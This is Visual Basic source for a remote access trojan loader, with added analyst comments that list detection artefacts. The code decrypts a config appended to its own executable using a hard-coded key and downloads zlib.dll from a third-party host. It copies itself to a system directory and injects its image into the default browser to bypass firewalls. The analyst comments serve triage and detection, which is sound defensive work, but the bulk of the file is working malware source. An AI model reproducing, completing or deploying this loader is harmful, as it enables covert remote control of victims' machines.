' Module-level constants and state for the loader in Sub Main.
' Analyst view: every value that drives behaviour is either hard-coded here or
' parsed at run time from a tagged config blob ({NN=...=NN} fields) in Main.
Option Explicit
' Passed as the second argument to vbReadEndFile(AppExe, ...) in Main.
' NOTE(review): presumably the byte size of the built stub, with the config
' appended after it - confirm against vbReadEndFile, which is not shown here.
Public Const FINAL_PROGRAM_SIZE = 61440
' Key handed to DecryptString for the config blob. It is a fixed literal, so the
' config can be recovered statically from any copy of the binary.
Public Const PassString As String = "password"
' Empty and not referenced in the code shown here.
Public Const ServerPass As String = ""
' Connection target, filled from config fields {01=...=01} and {02=...=02} in Main.
Public IpToConnectTo As String, PortToConnectTo As Long
' MeltToFile / MeltToDirectory: install ("melt") path built from fields {04} and {05}.
' UserConnected is not used in the code shown here.
Public UserConnected As Long, MeltToFile As String, MeltToDirectory As String
' Main: program entry point. Behaviour splits on whether SysDir & "ei_log.log" exists.
'
'   File present (second stage): decrypt the file with PassString, parse the
'   connection target ({01}, {02}) and install path ({04}, {05}), fetch zlib.dll
'   if UserHasZLIB = 0, delete the file and show frmMain.
'
'   File absent (first run): read a blob from the end of the program's own
'   executable, write it to ei_log.log, choose a target process from field {08},
'   copy itself to the install path and hand its own image bytes to RunExe.
'
' Observable artefacts visible in this listing (useful for detection/triage):
'   - ei_log.log created and later deleted in the directory returned by SysDir
'   - zlib.dll written to the same directory after an HTTP download
'   - the program relaunching itself through ShellExecute
'   - a message box with the text "Program Detection Error"
'
' All helpers (SysDir, FileExists, DeleteFile, vbReadEndFile, DecryptString,
' RunExe, InitiateMelt, ...) are defined elsewhere; what they do is inferred
' from their names and from the author's comments, not verified here.
Sub Main()
'On Error Resume Next
'
Dim s1 As String, sFile As String
Dim strInfo() As String
Dim ServerFile As String, EncryptedInfo As String
Dim s2 As String, ServerBytes() As Byte, b1() As Byte, MeltDir As Long
Dim InjectedProcesses() As String, ProcessToInject As String
Dim i1 As Long, i2 As Long, i3 As Long
' Hand-off file between the two stages; fixed name, so it is a stable file-system indicator.
EncryptedInfo = SysDir & "ei_log.log"
If FileExists(EncryptedInfo) Then
' An empty hand-off file is treated as stale: delete it, relaunch this executable and terminate.
If FileLen(EncryptedInfo) = 0 Then
DeleteFile EncryptedInfo
ShellExecute 0, "", AppExe, 0, "", 1
End
End If
'firewall bypass
'this part of the program reads itself.
'a file was stored in the other instance that is now available for use
'so you have to collect the RAT [stored] data and use it in the RAT
' Config is decrypted with the hard-coded PassString; the fields below are located
' by InStr/Mid on literal {NN= ... =NN} tags.
sFile = DecryptString(StrConv(vbReadEndFile(EncryptedInfo, 0), vbFromUnicode), PassString)
s1 = sFile
' {01} -> host to connect to, {02} -> port (converted with CLng).
IpToConnectTo = Mid(s1, InStr(1, s1, "{01=") + 4, InStr(1, s1, "=01}") - InStr(1, s1, "{01=") - 4)
PortToConnectTo = CLng(Mid(s1, InStr(1, s1, "{02=") + 4, InStr(1, s1, "=02}") - InStr(1, s1, "{02=") - 4))
' {04} -> install file name, {05} -> directory selector (0..3, mapped below).
MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
' Selector values outside 0..3 leave MeltToDirectory unchanged (no Case Else).
Select Case MeltDir
Case 0
MeltToDirectory = SysDir
Case 1
MeltToDirectory = WinDir
Case 2
MeltToDirectory = AppPath
Case 3
MeltToDirectory = GetTempPath
End Select
MeltToFile = LCase(MeltToDirectory & MeltToFile)
'if user doesnt have zLib, download it now for compression
'this will make the 2.5 mb screenshots ~50kb, and still crystal clear picture
' The DLL is fetched over plain HTTP from a third-party file host and written next to
' system binaries; no integrity check is visible in this listing. The outbound request
' and the new zlib.dll are both observable artefacts. Meaning of the 256 argument is
' not shown here.
If UserHasZLIB = 0 Then
DeleteFile SysDir & "zlib.dll"
Call GetInternetFile("http://www.hotlinkfiles.com/files/878001_9nuek/zlib.dll", SysDir & "zlib.dll", 256)
End If
' Hand-off file is removed once parsed, so it exists on disk only between the two stages.
DeleteFile EncryptedInfo
Load frmMain
frmMain.Show
Else
'default when user opens.. right here we want to store the RAT's
'information so that the firewall bypass can read it, avoiding registry.
'might as well encrypt the file
'soo in a nutshell..
'this part of the program reads itself and stores the information for
'access to the next loaded version with FWB+
'i keep these notes to help me remind myself.
'open itself and decrypt string
' Reads from the program's own executable using FINAL_PROGRAM_SIZE.
' NOTE(review): presumably this returns the data appended after the stub - confirm in vbReadEndFile.
ServerBytes = vbReadEndFile(AppExe, FINAL_PROGRAM_SIZE)
' Byte array -> String -> byte array round trip before writing the blob out.
sFile = CStr(ServerBytes())
ServerBytes = sFile
DeleteFile EncryptedInfo
' The blob is written to ei_log.log before DecryptString is applied, i.e. still in
' its encrypted form.
vbWriteByteFile EncryptedInfo, ServerBytes
sFile = DecryptString(sFile, PassString)
'=================================
'
'Find a process to inject to, with internet access
'
'=================================
' {08} -> "|"-separated list of candidate host processes; the literal entry
' "[DefaultBrowser]" is replaced by ExeRegPath(DefaultBrowser).
s2 = Mid(sFile, InStr(1, sFile, "{08=") + 4, InStr(1, sFile, "=08}") - InStr(1, sFile, "{08=") - 4)
' The list is only processed when it contains at least one "|".
If InStr(1, s2, "|") Then
InjectedProcesses = Split(s2, "|")
For i1 = LBound(InjectedProcesses) To UBound(InjectedProcesses)
If LCase(InjectedProcesses(i1)) = LCase("[DefaultBrowser]") Then
'If we hit the default browser, we are just gonna load into it
InjectedProcesses(i1) = ExeRegPath(DefaultBrowser)
If FileExists(InjectedProcesses(i1)) Then
'the browser exists, inject into it
ProcessToInject = InjectedProcesses(i1)
Else
' Empty placeholder branch: no fallback is implemented here.
If Len(s2) = 0 Then
'alternative find default browser through Shell32
End If
End If
' Setting the counter to the upper bound ends the loop after this iteration.
i1 = UBound(InjectedProcesses)
End If
If IsProcessEXERunning(InjectedProcesses(i1)) Then
'process running , run one after
ProcessToInject = AppFullPath(InjectedProcesses(i1))
i1 = UBound(InjectedProcesses)
End If
Next
' Fallback to the default browser path; reached only inside the "|" branch above.
If ProcessToInject = "" Then ProcessToInject = ExeRegPath(DefaultBrowser)
End If
'=================================
'
'Determine if we need to melt
'
'=================================
' Same {04}/{05} parsing and directory mapping as in the second-stage branch.
MeltToFile = Mid(sFile, InStr(1, sFile, "{04=") + 4, InStr(1, sFile, "=04}") - InStr(1, sFile, "{04=") - 4)
MeltDir = Mid(sFile, InStr(1, sFile, "{05=") + 4, InStr(1, sFile, "=05}") - InStr(1, sFile, "{05=") - 4)
Select Case MeltDir
Case 0
MeltToDirectory = SysDir
Case 1
MeltToDirectory = WinDir
Case 2
MeltToDirectory = AppPath
Case 3
MeltToDirectory = GetTempPath
End Select
MeltToFile = LCase(MeltToDirectory & MeltToFile)
' Compares the running executable's path with the configured install path.
If LCase(AppExe) <> MeltToFile Then
'we need to melt
' Replaces any existing file at the install path with a copy of this executable
' (skipped when the selector is 2, i.e. AppPath).
DeleteFile MeltToFile
If MeltDir <> 2 Then FileCopy AppExe, MeltToFile
' Own image bytes are loaded and passed, with the chosen host process path, to RunExe.
' Per the author's comments this runs the payload inside that process; RunExe and
' InitiateMelt are not shown, so their exact effect is unverified here.
b1 = LoadFile(AppExe)
If MeltDir <> 2 Then InitiateMelt
RunExe ProcessToInject, b1
Exit Sub
Else
'shouldnt be occuring!!
'program will uninstall after this
' Running from the install path without a hand-off file: clean up, show a
' user-visible error, call InitiateMelt and terminate.
DeleteFile EncryptedInfo
MsgBox "Program Detection Error"
InitiateMelt
End
End If
End If
End Sub
PROBAR SI SIRVE ESTO :s